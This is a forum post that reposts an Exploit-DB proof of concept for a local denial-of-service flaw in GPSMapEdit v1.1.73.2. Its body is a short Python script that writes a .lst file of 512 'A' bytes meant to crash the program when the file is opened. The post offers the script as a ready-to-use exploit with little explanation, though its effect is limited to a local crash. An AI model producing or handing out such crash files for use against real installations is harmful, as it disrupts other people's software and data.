Jump to content
The_Arhitect

GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability

Recommended Posts

Posted

#!/usr/bin/python

# Exploit Title: GPSMapEdit v1.1.73.2 (.lst) Local Denial of Service Vulnerability
# Version: 1.1.73.2
# Date: 2012-01-08
# Author: Julien Ahrens
# Homepage: www.inshell.net
# Software Link: http://www.geopainting.com
# Tested on: Windows XP SP3 Professional German / Windows 7 Professional 64bit German

file="GPSMapEdit_crash.lst"
junk="\x41"*512

print "[*] Creating crash file...\n";
writeFile = open (file, "w")
writeFile.write(junk)
writeFile.close()
print "[*] File successfully created!\n\n";

source: exploit-db.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...